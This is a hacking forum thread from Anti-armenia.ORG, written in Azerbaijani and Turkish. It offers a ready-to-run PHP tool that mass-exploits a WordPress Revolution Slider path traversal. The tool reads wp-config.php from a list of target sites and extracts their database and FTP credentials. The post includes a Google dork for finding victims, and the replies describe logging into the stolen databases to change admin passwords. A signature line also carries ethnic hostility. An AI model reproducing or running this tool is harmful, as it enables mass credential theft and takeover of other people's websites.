Anti-armenia.ORG - Forumlar - WordPress revslider Açığı Videolu İzahı



Istifadəçi
     2016-03-11 02:59 GMT                 

Mr.T473H


Banned
Mesaj Sayı : 62
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Salam Dostlar Bu Videomda Sizlərə revslider Açığını Başa Salacam İNŞALLAH.

Buyurun İzləyin...

Dork: inurl:wp-content/plugins/revslider/

Exploit: /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

Video



EXPLOIT KODU:

<body bgcolor="#000000" text="white">
<center>
<img src='https://s.w.org/about/images/fanart/logo_500x500.png' height="150" width="150"></img><br>
<font face='courier' color=red size='+1'>
mass revslider exploiting<br>by Azerbaijani Hackers Dj_Taleh<br>http://Anti-armenia.org/</font><br>
<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='get'>
</form>
<?php

function findit($mytext,$starttag,$endtag) {
$posLeft = stripos($mytext,$starttag)+strlen($starttag);
$posRight = stripos($mytext,$endtag,$posLeft+1);
return substr($mytext,$posLeft,$posRight-$posLeft);
}
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if($ya){
$e=explode("\r\n",$co);
foreach($e as $bda){
//echo '<br>'.$bda;
$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
$dn=($bda).($linkof);
$file=@file_get_contents($dn);
if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
}
elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
}
else{echo "<center><font face='courier' color='yellow' >".$bda." Not Work</font></center>";}
echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
}

}

?>

İşinizə Yaradəsa Bildirin...

Anti-armenia.ORG
     
 

Istifadəçi
     2016-03-11 06:12 GMT                 

DefaceR


İstifadəçi
Mesaj Sayı : 124
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Cəlillabad
Ölkə :
Məslək : Defacer
Yaş : 23
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər

Dövlət İçində Dövlət Olmaz!
Anti-armenia.ORG
     
 

Istifadəçi
     2016-03-12 05:52 GMT                 

Mr.T473H


Banned
Mesaj Sayı : 62
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Buyur Qardaş

Anti-armenia.ORG
     
 

Istifadəçi
     2016-03-13 20:05 GMT                 

Khaos


Gold
Mesaj Sayı : 589
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   34  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Khaos
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər

armenian terrorism... Don't forget Khojaly! “It is impossible to justify Khojaly in the eyes of the world community." #JusticeForKHOJALY
Anti-armenia.ORG
     
 

Istifadəçi
     2016-03-15 16:57 GMT                 

Mr.T473H


Banned
Mesaj Sayı : 62
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#54340 Khaos :
Təşəkkürlər


Buyur Bro

Anti-armenia.ORG
     
 

Istifadəçi
     2016-03-15 22:25 GMT                 

Aligarhx


İstifadəçi
Mesaj Sayı : 349
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Scanner
Ölkə :
Məslək : Defacer#Sqlmentos
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər
Bundan istifadə etdim

Bizim Ormanda ancaq "CaNaVar" kimi oğlanlari qrev aparir!
Anti-armenia.ORG
     
 

Istifadəçi
     2016-03-24 10:22 GMT                 

Mr.T473H


Banned
Mesaj Sayı : 62
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#54384 Aligarhx :
Təşəkkürlər
Bundan istifadə etdim


Lap Yaxşı

Anti-armenia.ORG
     
 

Istifadəçi
     2016-04-04 17:38 GMT                 

FeHRaDLi


İstifadəçi
Mesaj Sayı : 15
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


exploti hansı saytda yazıb oxuya bilmədim yoturubede

ALLAHUƏKBƏR
Anti-armenia.ORG
     
 

Istifadəçi
     2016-04-05 14:35 GMT                 

DarkCb23


İstifadəçi
Mesaj Sayı : 1
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Merhaba kardeşim bundan sonra ne yapacaz

Anti-armenia.ORG
     
 

Istifadəçi
     2016-04-05 20:17 GMT                 

Cafar


İstifadəçi
Mesaj Sayı : 4
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baki
Ölkə :
Məslək : Telebe
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Teşekkür, bu proqramı nə ilə yığıbsan? yani necə

Anti-armenia.ORG
     
 

Istifadəçi
     2016-04-16 06:42 GMT                 

BorLak


İstifadəçi
Mesaj Sayı : 2
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Merhaba Arkadaşlar bunu kullanabilmeniz için db host adresinin localhost olmaması lazım. Eğer orda db adresi yazıyorsa örneğin : server.goddy.com v.s gibi artık nerdeyse db si ozaman kullanabilirsiniz. Ondan sonrada bir db shell ile uzaktan sitenin db sine bağlanıp wp giriş şifresini değiştirip wp-login.php girişi yapıyorsunuz okadar basit

Anti-armenia.ORG
     
 

Istifadəçi
     2016-04-23 20:20 GMT                 

Cafar


İstifadəçi
Mesaj Sayı : 4
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baki
Ölkə :
Məslək : Telebe
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Salam exploit hansı proqramlama dilində yazılır? birdə belə bir sualım var nə məsləhət görürsüz html dən sonra birbaşa php öyrənə bilərəm? ya python öyrənim.html den anlayışım var . indidən təşəkkür

Anti-armenia.ORG
     
 

Istifadəçi
     2016-11-11 13:40 GMT                 

AZ.HACK777


İstifadəçi
Mesaj Sayı : 2
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : aku
Ölkə :
Məslək : AZ.HACK777
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Sitat
#54612 FeHRaDLi :
exploti hansı saytda yazıb oxuya bilmədim yoturubede


BRO brinci notepad-i aç sonra exploiti koçür yadaşa salanda ozun ad qoy axrina .php yaz qurtardi

Meqsedim komekti

AZ.HACK Offical page
Anti-armenia.ORG
     
 

Istifadəçi
     2016-11-11 15:10 GMT                 

M364Z01D


Gold
Mesaj Sayı : 60
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#54768 BorLak :
Merhaba Arkadaşlar bunu kullanabilmeniz için db host adresinin localhost olmaması lazım. Eğer orda db adresi yazıyorsa örneğin : server.goddy.com v.s gibi artık nerdeyse db si ozaman kullanabilirsiniz. Ondan sonrada bir db shell ile uzaktan sitenin db sine bağlanıp wp giriş şifresini değiştirip wp-login.php girişi yapıyorsunuz okadar basit


yanlış fikir localhost olsa belə 3306 port açıqdırsa qoşulmaq olar uzaqdan

VƏTƏN SƏNƏ CANIM FƏDA !
Anti-armenia.ORG
     
 

Istifadəçi
     2016-11-12 14:57 GMT                 

PuN!Sh3r


Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#56316 M364Z01D :
Sitat
#54768 BorLak :
Merhaba Arkadaşlar bunu kullanabilmeniz için db host adresinin localhost olmaması lazım. Eğer orda db adresi yazıyorsa örneğin : server.goddy.com v.s gibi artık nerdeyse db si ozaman kullanabilirsiniz. Ondan sonrada bir db shell ile uzaktan sitenin db sine bağlanıp wp giriş şifresini değiştirip wp-login.php girişi yapıyorsunuz okadar basit


yanlış fikir localhost olsa belə 3306 port açıqdırsa qoşulmaq olar uzaqdan


3306 açıq olması ora qoşula biləcəyin anlamına gəlmir. Mysql konfuqurasiya etmək olur ki, ancaq loopback (127.0.0.1) dən gələn sorğulara cavab versin(username və pass düz olsa belə).

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
     
 

Istifadəçi
     2016-11-12 17:20 GMT                 

M364Z01D


Gold
Mesaj Sayı : 60
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#56327 PuN!Sh3r :
Sitat
#56316 M364Z01D :
Sitat
#54768 BorLak :
Merhaba Arkadaşlar bunu kullanabilmeniz için db host adresinin localhost olmaması lazım. Eğer orda db adresi yazıyorsa örneğin : server.goddy.com v.s gibi artık nerdeyse db si ozaman kullanabilirsiniz. Ondan sonrada bir db shell ile uzaktan sitenin db sine bağlanıp wp giriş şifresini değiştirip wp-login.php girişi yapıyorsunuz okadar basit


yanlış fikir localhost olsa belə 3306 port açıqdırsa qoşulmaq olar uzaqdan


3306 açıq olması ora qoşula biləcəyin anlamına gəlmir. Mysql konfuqurasiya etmək olur ki, ancaq loopback (127.0.0.1) dən gələn sorğulara cavab versin(username və pass düz olsa belə).


Qardaş deyirki localhost olsa qoşulmaq olmur məndə diyirəmki 3306 port açıqdırsa qoşulmaq olar ( amma ki həmişə alınmırda sən dediyin variantda var )

VƏTƏN SƏNƏ CANIM FƏDA !
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG